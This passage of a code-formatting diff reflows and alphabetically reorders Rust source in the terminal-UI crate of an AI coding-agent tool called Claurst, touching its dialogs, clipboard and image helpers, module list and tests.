-    push_detail_row(&mut lines, "Type",    &hook.hook_type);
+    push_detail_row(&mut lines, "Type", &hook.hook_type);
     lines.push(Line::from(""));
     lines.push(Line::from(vec![Span::styled(
         "  Target:",
         Style::default().fg(Color::DarkGray),
     )]));
     // Wrap long target strings across multiple lines
-    for (i, chunk) in hook.target.chars().collect::<Vec<_>>().chunks(60).enumerate() {
+    for (i, chunk) in hook
+        .target
+        .chars()
+        .collect::<Vec<_>>()
+        .chunks(60)
+        .enumerate()
+    {
         let text: String = chunk.iter().collect();
         let indent = if i == 0 { "    " } else { "    " };
         lines.push(Line::from(vec![Span::styled(
@@ -509,7 +580,9 @@ fn render_hook_detail(state: &HooksConfigMenuState) -> (&'static str, Vec<Line<'
     lines.push(Line::from(""));
     lines.push(Line::from(vec![Span::styled(
         "  Edit ~/.claurst/settings.json to modify hooks.",
-        Style::default().fg(Color::DarkGray).add_modifier(Modifier::ITALIC),
+        Style::default()
+            .fg(Color::DarkGray)
+            .add_modifier(Modifier::ITALIC),
     )]));
     (" Hook Detail ", lines)
 }
@@ -517,9 +590,16 @@ fn render_hook_detail(state: &HooksConfigMenuState) -> (&'static str, Vec<Line<'
 // ---- Line helpers ----------------------------------------------------------
 
 fn push_list_row(lines: &mut Vec<Line<'static>>, label: &str, badge: &str, selected: bool) {
-    let bg = if selected { CLAURST_ACCENT } else { CLAURST_PANEL_BG };
+    let bg = if selected {
+        CLAURST_ACCENT
+    } else {
+        CLAURST_PANEL_BG
+    };
     let row_style = if selected {
-        Style::default().fg(Color::White).bg(bg).add_modifier(Modifier::BOLD)
+        Style::default()
+            .fg(Color::White)
+            .bg(bg)
+            .add_modifier(Modifier::BOLD)
     } else {
         Style::default().fg(CLAURST_TEXT).bg(bg)
     };
@@ -537,7 +617,10 @@ fn push_list_row(lines: &mut Vec<Line<'static>>, label: &str, badge: &str, selec
 
 fn push_detail_row(lines: &mut Vec<Line<'static>>, key: &str, value: &str) {
     lines.push(Line::from(vec![
-        Span::styled(format!("  {key:<10}  "), Style::default().fg(Color::DarkGray)),
+        Span::styled(
+            format!("  {key:<10}  "),
+            Style::default().fg(Color::DarkGray),
+        ),
         Span::styled(value.to_string(), Style::default().fg(Color::White)),
     ]));
 }
@@ -559,7 +642,12 @@ mod tests {
         }];
         state.build_events();
 
-        let area = Rect { x: 0, y: 0, width: 90, height: 28 };
+        let area = Rect {
+            x: 0,
+            y: 0,
+            width: 90,
+            height: 28,
+        };
         let mut buf = Buffer::empty(area);
         render_hooks_config_menu(&state, area, &mut buf);
 
@@ -573,4 +661,3 @@ mod tests {
         assert!(rendered.contains("PreToolUse"));
     }
 }
-

--- a/src-rust/crates/tui/src/image_paste.rs
+++ b/src-rust/crates/tui/src/image_paste.rs
@@ -83,7 +83,11 @@ fn read_text_windows() -> Option<String> {
         .output()
         .ok()?;
     if out.status.success() && !out.stdout.is_empty() {
-        Some(String::from_utf8_lossy(&out.stdout).trim_end_matches('\n').to_string())
+        Some(
+            String::from_utf8_lossy(&out.stdout)
+                .trim_end_matches('\n')
+                .to_string(),
+        )
     } else {
         None
     }
@@ -135,7 +139,10 @@ close access fp"#,
         tmp.display()
     );
 
-    let write_out = Command::new("osascript").args(["-e", &script]).output().ok()?;
+    let write_out = Command::new("osascript")
+        .args(["-e", &script])
+        .output()
+        .ok()?;
     if write_out.status.success() && tmp.exists() && tmp.metadata().ok()?.len() > 0 {
         let dims = png_dimensions(&tmp);
         Some(PastedImage {
@@ -216,7 +223,10 @@ fn try_save_linux_image(path: &PathBuf) -> bool {
         }
     }
     // wl-paste
-    if let Ok(out) = Command::new("wl-paste").args(["--type", "image/png"]).output() {
+    if let Ok(out) = Command::new("wl-paste")
+        .args(["--type", "image/png"])
+        .output()
+    {
         if out.status.success() && !out.stdout.is_empty() {
             if std::fs::write(path, &out.stdout).is_ok() {
                 return true;
@@ -283,11 +293,17 @@ fn read_image_windows() -> Option<PastedImage> {
 /// Write text to the system clipboard. Returns `true` on success.
 pub fn write_clipboard_text(text: &str) -> bool {
     #[cfg(target_os = "macos")]
-    { write_text_macos_w(text) }
+    {
+        write_text_macos_w(text)
+    }
     #[cfg(target_os = "windows")]
-    { write_text_windows_w(text) }
+    {
+        write_text_windows_w(text)
+    }
     #[cfg(not(any(target_os = "macos", target_os = "windows")))]
-    { write_text_linux_w(text) }
+    {
+        write_text_linux_w(text)
+    }
 }
 
 #[cfg(target_os = "macos")]
@@ -309,7 +325,8 @@ fn write_text_windows_w(text: &str) -> bool {
     use std::io::Write;
     use std::process::Stdio;
     // PowerShell Set-Clipboard reads from stdin via pipe
-    let script = format!("[Console]::InputEncoding = [System.Text.Encoding]::UTF8; $input | Set-Clipboard");
+    let script =
+        format!("[Console]::InputEncoding = [System.Text.Encoding]::UTF8; $input | Set-Clipboard");
     let mut child = match Command::new("powershell")
         .args(["-NoProfile", "-Command", &script])
         .stdin(Stdio::piped())
@@ -447,10 +464,8 @@ mod tests {
         let tmp = make_temp_png().unwrap();
         std::fs::write(&tmp, b"hello world").unwrap();
         let b64 = encode_image_base64(&tmp).unwrap();
-        let decoded = base64::Engine::decode(
-            &base64::engine::general_purpose::STANDARD,
-            &b64,
-        ).unwrap();
+        let decoded =
+            base64::Engine::decode(&base64::engine::general_purpose::STANDARD, &b64).unwrap();
         assert_eq!(decoded, b"hello world");
         let _ = std::fs::remove_file(&tmp);
     }

--- a/src-rust/crates/tui/src/invalid_config_dialog.rs
+++ b/src-rust/crates/tui/src/invalid_config_dialog.rs
@@ -148,7 +148,9 @@ pub fn render_invalid_config_dialog(
     // Instructions
     lines.push(Line::from(vec![Span::styled(
         "To resolve:".to_string(),
-        Style::default().fg(Color::Cyan).add_modifier(Modifier::BOLD),
+        Style::default()
+            .fg(Color::Cyan)
+            .add_modifier(Modifier::BOLD),
     )]));
     let instructions = match state.kind {
         InvalidConfigKind::Settings => vec![
@@ -177,7 +179,9 @@ pub fn render_invalid_config_dialog(
     // Dismiss hint
     lines.push(Line::from(vec![Span::styled(
         "  Press Enter or Escape to dismiss and continue with defaults.",
-        Style::default().fg(Color::DarkGray).add_modifier(Modifier::ITALIC),
+        Style::default()
+            .fg(Color::DarkGray)
+            .add_modifier(Modifier::ITALIC),
     )]));
 
     let total_lines = lines.len() as u16;
@@ -230,13 +234,19 @@ mod tests {
         let mut terminal = Terminal::new(TestBackend::new(100, 40)).unwrap();
         let state = InvalidConfigDialogState::show_settings_error("JSON parse error: unexpected ,");
 
-        terminal.draw(|frame| {
-            let area = frame.area();
-            render_invalid_config_dialog(frame, &state, area);
-        }).unwrap();
+        terminal
+            .draw(|frame| {
+                let area = frame.area();
+                render_invalid_config_dialog(frame, &state, area);
+            })
+            .unwrap();
 
         let buf = terminal.backend().buffer().clone();
-        let content: String = buf.content().iter().map(|c| c.symbol().chars().next().unwrap_or(' ')).collect();
+        let content: String = buf
+            .content()
+            .iter()
+            .map(|c| c.symbol().chars().next().unwrap_or(' '))
+            .collect();
         assert!(content.contains("Invalid Settings") || content.contains("Configuration"));
     }
 
@@ -245,13 +255,19 @@ mod tests {
         let mut terminal = Terminal::new(TestBackend::new(100, 40)).unwrap();
         let state = InvalidConfigDialogState::show_settings_error("missing field `model`");
 
-        terminal.draw(|frame| {
-            let area = frame.area();
-            render_invalid_config_dialog(frame, &state, area);
-        }).unwrap();
+        terminal
+            .draw(|frame| {
+                let area = frame.area();
+                render_invalid_config_dialog(frame, &state, area);
+            })
+            .unwrap();
 
         let buf = terminal.backend().buffer().clone();
-        let content: String = buf.content().iter().map(|c| c.symbol().chars().next().unwrap_or(' ')).collect();
+        let content: String = buf
+            .content()
+            .iter()
+            .map(|c| c.symbol().chars().next().unwrap_or(' '))
+            .collect();
         assert!(content.contains("missing field") || content.contains("Error"));
     }
 
@@ -261,10 +277,12 @@ mod tests {
         let state = InvalidConfigDialogState::new(); // visible = false
         let snapshot_before = terminal.backend().buffer().clone();
 
-        terminal.draw(|frame| {
-            let area = frame.area();
-            render_invalid_config_dialog(frame, &state, area);
-        }).unwrap();
+        terminal
+            .draw(|frame| {
+                let area = frame.area();
+                render_invalid_config_dialog(frame, &state, area);
+            })
+            .unwrap();
 
         // Buffer should be unchanged since dialog is hidden
         let buf = terminal.backend().buffer().clone();

--- a/src-rust/crates/tui/src/key_input_dialog.rs
+++ b/src-rust/crates/tui/src/key_input_dialog.rs
@@ -86,11 +86,7 @@ impl KeyInputDialogState {
 
 /// Render the key input dialog overlay — OpenCode-style: dark overlay, no
 /// border, minimal and polished.
-pub fn render_key_input_dialog(
-    frame: &mut Frame,
-    state: &KeyInputDialogState,
-    area: Rect,
-) {
+pub fn render_key_input_dialog(frame: &mut Frame, state: &KeyInputDialogState, area: Rect) {
     if !state.visible {
         return;
     }
@@ -151,11 +147,7 @@ pub fn render_key_input_dialog(
         if len <= 4 {
             state.input.clone()
         } else {
-            format!(
-                "{}{}",
-                "\u{2022}".repeat(len - 4),
-                &state.input[len - 4..]
-            )
+            format!("{}{}", "\u{2022}".repeat(len - 4), &state.input[len - 4..])
         }
     };
 

--- a/src-rust/crates/tui/src/kitty_image.rs
+++ b/src-rust/crates/tui/src/kitty_image.rs
@@ -273,9 +273,9 @@ fn decode_png(data: &[u8]) -> Result<ImageData, Box<dyn std::error::Error>> {
     use std::io::Cursor;
 
     // Decode the PNG using the image crate with explicit format hint
-    let reader = ImageReader::new(Cursor::new(data))
-        .with_guessed_format()?;
-    let image = reader.decode()
+    let reader = ImageReader::new(Cursor::new(data)).with_guessed_format()?;
+    let image = reader
+        .decode()
         .map_err(|e| format!("Failed to decode PNG: {}", e))?;
 
     // Convert to RGBA8 format
@@ -299,9 +299,9 @@ fn decode_jpeg(data: &[u8]) -> Result<ImageData, Box<dyn std::error::Error>> {
     use std::io::Cursor;
 
     // Decode the JPEG using the image crate with explicit format hint
-    let reader = ImageReader::new(Cursor::new(data))
-        .with_guessed_format()?;
-    let image = reader.decode()
+    let reader = ImageReader::new(Cursor::new(data)).with_guessed_format()?;
+    let image = reader
+        .decode()
         .map_err(|e| format!("Failed to decode JPEG: {}", e))?;
 
     // Convert to RGBA8 format
@@ -399,7 +399,10 @@ mod tests {
         ];
 
         let result = decode_image_data(&png_data);
-        assert!(result.is_ok(), "decode_image_data should detect and decode PNG");
+        assert!(
+            result.is_ok(),
+            "decode_image_data should detect and decode PNG"
+        );
 
         let img = result.unwrap();
         assert_eq!(img.width, 1);
@@ -411,7 +414,10 @@ mod tests {
     fn test_decode_invalid_image() {
         let invalid_data = vec![0x00, 0x00, 0x00, 0x00];
         let result = decode_image_data(&invalid_data);
-        assert!(result.is_err(), "Invalid image data should produce an error");
+        assert!(
+            result.is_err(),
+            "Invalid image data should produce an error"
+        );
     }
 
     /// Test that decode_image_data rejects empty data.

--- a/src-rust/crates/tui/src/lib.rs
+++ b/src-rust/crates/tui/src/lib.rs
@@ -25,128 +25,155 @@ use std::io::{self, Stdout};
 // Sub-modules
 // ---------------------------------------------------------------------------
 
-/// Figure/icon constants matching src/constants/figures.ts
-pub mod figures;
-/// Rustle mascot rendering.
-pub mod rustle;
-/// Context window and rate-limit visualization overlay (/context).
-pub mod context_viz;
-/// Export format picker dialog (/export).
-pub mod export_dialog;
-/// Clipboard image paste and Ctrl+V text paste.
-pub mod image_paste;
-/// Inline image rendering via the Kitty graphics protocol (with text fallback).
-pub mod kitty_image;
-/// Application state and main event loop.
-pub mod app;
-/// Input helpers: slash command parsing.
-pub mod input;
-/// All ratatui rendering logic.
-pub mod render;
-/// Permission dialogs and confirmation dialogs.
-pub mod dialogs;
-/// Notification / banner system.
-pub mod notifications;
-/// Help overlay, history search, message selector, rewind flow.
-pub mod overlays;
-/// Bridge connection state and status badge.
-pub mod bridge_state;
-/// Plugin hint/recommendation UI.
-pub mod plugin_views;
-/// Full-screen tabbed settings interface.
-pub mod settings_screen;
-/// Theme picker overlay.
-pub mod theme_screen;
-/// Color palette management for different themes and accessibility support.
-pub mod theme_colors;
-/// Privacy settings dialog.
-pub mod privacy_screen;
-/// Diff viewer dialog (two-pane: file list + unified diff detail).
-pub mod diff_viewer;
-/// Virtual scrollable list for efficient message rendering.
-pub mod virtual_list;
-/// Message type renderers (assistant, user, tool use, etc.).
-pub mod messages;
-/// Turn-aware transcript grouping and metadata helpers.
-pub mod transcript_turn;
 /// Agent definitions list and coordinator progress view.
 pub mod agents_view;
-/// Stats dialog with token usage and cost charts.
-pub mod stats_dialog;
-/// MCP server management UI.
-pub mod mcp_view;
-/// Complete prompt input with vim mode, history, typeahead, and paste handling.
-pub mod prompt_input;
-/// Session quality feedback survey overlay.
-pub mod feedback_survey;
-/// Memory file selector overlay (AGENTS.md browser).
-pub mod memory_file_selector;
-/// Read-only hooks configuration browser.
-pub mod hooks_config_menu;
-/// Overage credit upsell banner (shown when user exceeds free-tier limit).
-pub mod overage_upsell;
-/// Voice mode availability notice (shown when voice is available but not enabled).
-pub mod voice_mode_notice;
-/// Message copy utilities for different formatting options (markdown, plaintext, code, JSON).
-pub mod message_copy;
-/// Desktop app upsell startup dialog (shown at startup on macOS/Windows x64).
-pub mod desktop_upsell_startup;
-/// Memory update notification banner (shown after Claurst updates a AGENTS.md file).
-pub mod memory_update_notification;
-/// MCP elicitation dialog (form-based user input requested by MCP servers).
-pub mod elicitation_dialog;
-/// Model picker overlay (/model command).
-pub mod model_picker;
-/// Session browser overlay (/session, /resume, /rename, /export).
-pub mod session_browser;
-/// Startup dialog for malformed settings.json or AGENTS.md.
-pub mod invalid_config_dialog;
+/// Application state and main event loop.
+pub mod app;
+/// Bridge connection state and status badge.
+pub mod bridge_state;
 /// Startup confirmation dialog for --dangerously-skip-permissions mode.
 pub mod bypass_permissions_dialog;
-/// First-launch onboarding / welcome dialog.
-pub mod onboarding_dialog;
-/// Reusable fuzzy-search selection dialog widget.
-pub mod dialog_select;
-/// Masked text input overlay for entering API keys.
-pub mod key_input_dialog;
+/// Context window and rate-limit visualization overlay (/context).
+pub mod context_viz;
+/// Desktop app upsell startup dialog (shown at startup on macOS/Windows x64).
+pub mod desktop_upsell_startup;
 /// Device code / browser-based auth overlay (GitHub Copilot, Anthropic OAuth).
 pub mod device_auth_dialog;
-/// Push-to-talk voice capture and Whisper transcription.
-pub mod voice_capture;
-/// Task progress overlay (Ctrl+T) — shows task status with inline toggle.
-pub mod tasks_overlay;
+/// Reusable fuzzy-search selection dialog widget.
+pub mod dialog_select;
+/// Permission dialogs and confirmation dialogs.
+pub mod dialogs;
+/// Diff viewer dialog (two-pane: file list + unified diff detail).
+pub mod diff_viewer;
+/// MCP elicitation dialog (form-based user input requested by MCP servers).
+pub mod elicitation_dialog;
+/// Export format picker dialog (/export).
+pub mod export_dialog;
+/// Session quality feedback survey overlay.
+pub mod feedback_survey;
+/// Figure/icon constants matching src/constants/figures.ts
+pub mod figures;
+/// Read-only hooks configuration browser.
+pub mod hooks_config_menu;
+/// Clipboard image paste and Ctrl+V text paste.
+pub mod image_paste;
+/// Input helpers: slash command parsing.
+pub mod input;
+/// Startup dialog for malformed settings.json or AGENTS.md.
+pub mod invalid_config_dialog;
+/// Masked text input overlay for entering API keys.
+pub mod key_input_dialog;
+/// Inline image rendering via the Kitty graphics protocol (with text fallback).
+pub mod kitty_image;
+/// MCP server management UI.
+pub mod mcp_view;
+/// Memory file selector overlay (AGENTS.md browser).
+pub mod memory_file_selector;
+/// Memory update notification banner (shown after Claurst updates a AGENTS.md file).
+pub mod memory_update_notification;
+/// Message copy utilities for different formatting options (markdown, plaintext, code, JSON).
+pub mod message_copy;
+/// Message type renderers (assistant, user, tool use, etc.).
+pub mod messages;
+/// Model picker overlay (/model command).
+pub mod model_picker;
+/// Notification / banner system.
+pub mod notifications;
+/// First-launch onboarding / welcome dialog.
+pub mod onboarding_dialog;
+/// Overage credit upsell banner (shown when user exceeds free-tier limit).
+pub mod overage_upsell;
+/// Help overlay, history search, message selector, rewind flow.
+pub mod overlays;
+/// Plugin hint/recommendation UI.
+pub mod plugin_views;
+/// Privacy settings dialog.
+pub mod privacy_screen;
+/// Complete prompt input with vim mode, history, typeahead, and paste handling.
+pub mod prompt_input;
+/// All ratatui rendering logic.
+pub mod render;
+/// Rustle mascot rendering.
+pub mod rustle;
 /// Session branching overlay (Ctrl+B) — create and switch between conversation branches.
 pub mod session_branching;
+/// Session browser overlay (/session, /resume, /rename, /export).
+pub mod session_browser;
+/// Full-screen tabbed settings interface.
+pub mod settings_screen;
+/// Stats dialog with token usage and cost charts.
+pub mod stats_dialog;
+/// Task progress overlay (Ctrl+T) — shows task status with inline toggle.
+pub mod tasks_overlay;
+/// Color palette management for different themes and accessibility support.
+pub mod theme_colors;
+/// Theme picker overlay.
+pub mod theme_screen;
+/// Turn-aware transcript grouping and metadata helpers.
+pub mod transcript_turn;
+/// Virtual scrollable list for efficient message rendering.
+pub mod virtual_list;
+/// Push-to-talk voice capture and Whisper transcription.
+pub mod voice_capture;
+/// Voice mode availability notice (shown when voice is available but not enabled).
+pub mod voice_mode_notice;
 
 // ---------------------------------------------------------------------------
 // Public re-exports
 // ---------------------------------------------------------------------------
 
-pub use app::{App, try_copy_to_clipboard};
-pub use notifications::NotificationKind;
+pub use agents_view::{
+    load_agent_definitions, render_agents_menu, render_coordinator_status, AgentDefinition,
+    AgentInfo, AgentStatus, AgentsMenuState,
+};
+pub use app::{try_copy_to_clipboard, App};
+pub use bypass_permissions_dialog::{
+    render_bypass_permissions_dialog, BypassPermissionsDialogState,
+};
+pub use desktop_upsell_startup::{
+    render_desktop_upsell_startup, DesktopUpsellSelection, DesktopUpsellStartupState,
+};
+pub use device_auth_dialog::{
+    render_device_auth_dialog, DeviceAuthDialogState, DeviceAuthEvent, DeviceAuthStatus,
+};
+pub use dialog_select::{render_dialog_select, DialogSelectState, SelectItem};
+pub use diff_viewer::{
+    load_git_diff, parse_unified_diff, render_diff_dialog, DiffPane, DiffType, DiffViewerState,
+};
+pub use elicitation_dialog::{
+    render_elicitation_dialog, ElicitationDialogState, ElicitationField, ElicitationFieldKind,
+    ElicitationResult,
+};
+pub use feedback_survey::{FeedbackResponse, FeedbackSurveyStage, FeedbackSurveyState};
+pub use hooks_config_menu::{HookEntry, HooksConfigMenuState};
 pub use input::{is_slash_command, parse_slash_command};
-pub use feedback_survey::{FeedbackSurveyState, FeedbackSurveyStage, FeedbackResponse};
-pub use memory_file_selector::{MemoryFileSelectorState, MemoryFile, MemoryFileType};
-pub use hooks_config_menu::{HooksConfigMenuState, HookEntry};
-pub use overage_upsell::{OverageCreditUpsellState, render_overage_upsell};
-pub use voice_mode_notice::{VoiceModeNoticeState, render_voice_mode_notice};
-pub use desktop_upsell_startup::{DesktopUpsellStartupState, DesktopUpsellSelection, render_desktop_upsell_startup};
-pub use memory_update_notification::{MemoryUpdateNotificationState, render_memory_update_notification, get_relative_memory_path};
-pub use elicitation_dialog::{ElicitationDialogState, ElicitationField, ElicitationFieldKind, ElicitationResult, render_elicitation_dialog};
-pub use diff_viewer::{DiffViewerState, DiffPane, DiffType, load_git_diff, parse_unified_diff, render_diff_dialog};
-pub use agents_view::{AgentInfo, AgentStatus, AgentsMenuState, AgentDefinition, render_agents_menu, render_coordinator_status, load_agent_definitions};
-pub use stats_dialog::{StatsDialogState, StatsTab, load_stats, render_stats_dialog};
-pub use mcp_view::{McpViewState, McpServerView, McpToolView, McpViewStatus, render_mcp_view};
-pub use prompt_input::{PromptInputState, VimMode, VimPendingState, VimOperator, VimFindKind, InputMode, render_prompt_input, handle_paste, compute_typeahead};
-pub use model_picker::{ModelPickerState, ModelEntry, EffortLevel, render_model_picker, model_supports_effort};
-pub use session_browser::{SessionBrowserState, SessionBrowserMode, SessionEntry, render_session_browser};
-pub use session_branching::{SessionBranchingState, BranchBrowserMode, BranchInfo, render_session_branching};
-pub use invalid_config_dialog::{InvalidConfigDialogState, InvalidConfigKind, render_invalid_config_dialog};
-pub use bypass_permissions_dialog::{BypassPermissionsDialogState, render_bypass_permissions_dialog};
-pub use onboarding_dialog::{OnboardingDialogState, render_onboarding_dialog};
-pub use dialog_select::{DialogSelectState, SelectItem, render_dialog_select};
-pub use key_input_dialog::{KeyInputDialogState, render_key_input_dialog};
-pub use device_auth_dialog::{DeviceAuthDialogState, DeviceAuthStatus, DeviceAuthEvent, render_device_auth_dialog};
+pub use invalid_config_dialog::{
+    render_invalid_config_dialog, InvalidConfigDialogState, InvalidConfigKind,
+};
+pub use key_input_dialog::{render_key_input_dialog, KeyInputDialogState};
+pub use mcp_view::{render_mcp_view, McpServerView, McpToolView, McpViewState, McpViewStatus};
+pub use memory_file_selector::{MemoryFile, MemoryFileSelectorState, MemoryFileType};
+pub use memory_update_notification::{
+    get_relative_memory_path, render_memory_update_notification, MemoryUpdateNotificationState,
+};
+pub use model_picker::{
+    model_supports_effort, render_model_picker, EffortLevel, ModelEntry, ModelPickerState,
+};
+pub use notifications::NotificationKind;
+pub use onboarding_dialog::{render_onboarding_dialog, OnboardingDialogState};
+pub use overage_upsell::{render_overage_upsell, OverageCreditUpsellState};
+pub use prompt_input::{
+    compute_typeahead, handle_paste, render_prompt_input, InputMode, PromptInputState, VimFindKind,
+    VimMode, VimOperator, VimPendingState,
+};
+pub use session_branching::{
+    render_session_branching, BranchBrowserMode, BranchInfo, SessionBranchingState,
+};
+pub use session_browser::{
+    render_session_browser, SessionBrowserMode, SessionBrowserState, SessionEntry,
+};
+pub use stats_dialog::{load_stats, render_stats_dialog, StatsDialogState, StatsTab};
+pub use voice_mode_notice::{render_voice_mode_notice, VoiceModeNoticeState};
 
 // ---------------------------------------------------------------------------
 // Terminal initialization / teardown helpers (public API)
@@ -194,11 +221,12 @@ pub fn setup_terminal() -> io::Result<Terminal<CrosstermBackend<Stdout>>> {
 pub fn restore_terminal(terminal: &mut Terminal<CrosstermBackend<Stdout>>) -> io::Result<()> {
     disable_raw_mode()?;
     // Restore the original title by clearing it (terminals fall back to default).
-    let _ = execute!(
+    let _ = execute!(terminal.backend_mut(), crossterm::terminal::SetTitle(""),);
+    execute!(
         terminal.backend_mut(),
-        crossterm::terminal::SetTitle(""),
-    );
-    execute!(terminal.backend_mut(), LeaveAlternateScreen, DisableMouseCapture)?;
+        LeaveAlternateScreen,
+        DisableMouseCapture
+    )?;
     terminal.show_cursor()?;
     Ok(())
 }
@@ -337,12 +365,18 @@ mod tests {
         assert!(app.intercept_slash_command("agents"));
         assert!(app.agents_menu.open);
         assert_eq!(app.agents_menu.active_agents.len(), 3);
-        assert_eq!(app.agents_menu.active_agents[0].status, AgentStatus::Running);
+        assert_eq!(
+            app.agents_menu.active_agents[0].status,
+            AgentStatus::Running
+        );
         assert_eq!(
             app.agents_menu.active_agents[1].status,
             AgentStatus::WaitingForTool
         );
-        assert_eq!(app.agents_menu.active_agents[2].status, AgentStatus::Complete);
+        assert_eq!(
+            app.agents_menu.active_agents[2].status,
+            AgentStatus::Complete
+        );
     }
 
     #[test]
@@ -357,12 +391,19 @@ mod tests {
 
         app.handle_key_event(ctrl(KeyCode::Char('s')));
 
-        let saved = temp.path().join(".claurst").join("agents").join("planner.md");
+        let saved = temp
+            .path()
+            .join(".claurst")
+            .join("agents")
+            .join("planner.md");
         assert!(saved.exists());
         let content = std::fs::read_to_string(saved).unwrap();
         assert!(content.contains("name: Planner"));
         assert!(content.contains("Help break work into steps."));
-        assert!(matches!(app.agents_menu.route, agents_view::AgentsRoute::Detail(_)));
+        assert!(matches!(
+            app.agents_menu.route,
+            agents_view::AgentsRoute::Detail(_)
+        ));
     }
 
     #[test]
@@ -375,7 +416,12 @@ mod tests {
         state.editor.description = "Builds code".to_string();
         state.editor.prompt = "Ship the feature.".to_string();
 
-        let area = Rect { x: 0, y: 0, width: 90, height: 24 };
+        let area = Rect {
+            x: 0,
+            y: 0,
+            width: 90,
+            height: 24,
+        };
         let mut buf = Buffer::empty(area);
         agents_view::render_agents_menu(&state, area, &mut buf);
 
@@ -784,7 +830,12 @@ mod tests {
         let mut state = DiffViewerState::new();
         state.open = true;
         state.diff_type = DiffType::TurnDiff;
-        let area = Rect { x: 0, y: 0, width: 80, height: 20 };
+        let area = Rect {
+            x: 0,
+            y: 0,
+            width: 80,
+            height: 20,
+        };
         let mut buf = Buffer::empty(area);
 
         diff_viewer::render_diff_dialog(&mut state, area, &mut buf);
@@ -890,7 +941,12 @@ mod tests {
         state.switch_pane();
         state.switch_pane();
 
-        let area = Rect { x: 0, y: 0, width: 120, height: 30 };
+        let area = Rect {
+            x: 0,
+            y: 0,
+            width: 120,
+            height: 30,
+        };
         let mut buf = Buffer::empty(area);
         mcp_view::render_mcp_view(&state, area, &mut buf);
         let rendered = buf
@@ -924,7 +980,12 @@ mod tests {
         let rendered = messages::render_message(&msg, &messages::RenderContext::default());
         let text = rendered
             .iter()
-            .map(|line| line.spans.iter().map(|span| span.content.clone()).collect::<String>())
+            .map(|line| {
+                line.spans
+                    .iter()
+                    .map(|span| span.content.clone())
+                    .collect::<String>()
+            })
             .collect::<Vec<_>>()
             .join("\n");
 
@@ -944,7 +1005,12 @@ mod tests {
         let rendered = messages::render_message(&msg, &messages::RenderContext::default());
         let text = rendered
             .iter()
-            .map(|line| line.spans.iter().map(|span| span.content.clone()).collect::<String>())
+            .map(|line| {
+                line.spans
+                    .iter()
+                    .map(|span| span.content.clone())
+                    .collect::<String>()
+            })
             .collect::<Vec<_>>()
             .join("\n");
 
@@ -1053,7 +1119,9 @@ mod tests {
         let mut terminal = Terminal::new(backend).unwrap();
         let mut app = make_app();
         app.push_message(claurst_core::types::Message::user("hello".to_string()));
-        app.push_message(claurst_core::types::Message::assistant("hi there".to_string()));
+        app.push_message(claurst_core::types::Message::assistant(
+            "hi there".to_string(),
+        ));
 
         terminal
             .draw(|frame| crate::render::render_app(frame, &app))
@@ -1114,6 +1182,3 @@ mod tests {
         assert_eq!(pr.options[3].key, 'n');
     }
 }
-
-
-

--- a/src-rust/crates/tui/src/mcp_view.rs
+++ b/src-rust/crates/tui/src/mcp_view.rs
@@ -131,7 +131,9 @@ impl McpViewState {
         self.error_expanded = !self.error_expanded;
     }
 
-    pub fn close(&mut self) { self.open = false; }
+    pub fn close(&mut self) {
+        self.open = false;
+    }
 
     pub fn switch_pane(&mut self) {
         self.active_pane = match self.active_pane {
@@ -212,7 +214,9 @@ impl McpViewState {
 }
 
 impl Default for McpViewState {
-    fn default() -> Self { Self::new() }
+    fn default() -> Self {
+        Self::new()
+    }
 }
 
 // ---------------------------------------------------------------------------
@@ -220,7 +224,9 @@ impl Default for McpViewState {
 // ---------------------------------------------------------------------------
 
 pub fn render_mcp_view(state: &McpViewState, area: Rect, buf: &mut Buffer) {
-    if !state.open { return; }
+    if !state.open {
+        return;
+    }
 
     let w = (area.width * 9 / 10).max(50).min(area.width);
     let h = (area.height * 4 / 5).max(15).min(area.height);
@@ -241,17 +247,34 @@ pub fn render_mcp_view(state: &McpViewState, area: Rect, buf: &mut Buffer) {
 
     let layout = Layout::default()
         .direction(Direction::Vertical)
-        .constraints([Constraint::Length(1), Constraint::Min(1), Constraint::Length(1)])
+        .constraints([
+            Constraint::Length(1),
+            Constraint::Min(1),
+            Constraint::Length(1),
+        ])
         .split(inner);
 
     let title = Line::from(vec![
-        Span::styled(" MCP", Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD)),
         Span::styled(
-            format!(" — {} servers · {} tools", state.servers.len(), state.filtered_tools().len()),
+            " MCP",
+            Style::default()
+                .fg(CLAURST_ACCENT)
+                .add_modifier(Modifier::BOLD),
+        ),
+        Span::styled(
+            format!(
+                " — {} servers · {} tools",
+                state.servers.len(),
+                state.filtered_tools().len()
+            ),
             Style::default().fg(CLAURST_MUTED),
         ),
         Span::styled(
-            format!("{:>width$}", "Esc close", width = inner.width.saturating_sub(26) as usize),
+            format!(
+                "{:>width$}",
+                "Esc close",
+                width = inner.width.saturating_sub(26) as usize
+            ),
             Style::default().fg(CLAURST_MUTED),
         ),
     ]);
@@ -277,13 +300,33 @@ pub fn render_mcp_view(state: &McpViewState, area: Rect, buf: &mut Buffer) {
     render_tool_detail(state, right_panes[1], buf);
 
     let footer = Line::from(vec![
-        Span::styled(" Tab ", Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD)),
+        Span::styled(
+            " Tab ",
+            Style::default()
+                .fg(CLAURST_ACCENT)
+                .add_modifier(Modifier::BOLD),
+        ),
         Span::raw("switch pane  "),
-        Span::styled(" / ", Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD)),
+        Span::styled(
+            " / ",
+            Style::default()
+                .fg(CLAURST_ACCENT)
+                .add_modifier(Modifier::BOLD),
+        ),
         Span::raw("filter tools  "),
-        Span::styled(" e ", Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD)),
+        Span::styled(
+            " e ",
+            Style::default()
+                .fg(CLAURST_ACCENT)
+                .add_modifier(Modifier::BOLD),
+        ),
         Span::raw("error detail  "),
-        Span::styled(" r ", Style::default().fg(CLAURST_ACCENT).add_modifier(Modifier::BOLD)),
+        Span::styled(
+            " r ",
+            Style::default()
+                .fg(CLAURST_ACCENT)
+                .add_modifier(Modifier::BOLD),
+        ),
         Span::raw("reconnect"),
     ]);
     Paragraph::new(footer)
@@ -302,7 +345,11 @@ fn render_server_list(state: &McpViewState, area: Rect, buf: &mut Buffer) {
         .title(Span::styled(
             " Servers ",
             Style::default()
-                .fg(if focused { CLAURST_ACCENT } else { CLAURST_MUTED })
+                .fg(if focused {
+                    CLAURST_ACCENT
+                } else {
+                    CLAURST_MUTED
+                })
                 .add_modifier(Modifier::BOLD),
         ))
         .borders(Borders::ALL)
@@ -310,23 +357,68 @@ fn render_server_list(state: &McpViewState, area: Rect, buf: &mut Buffer) {
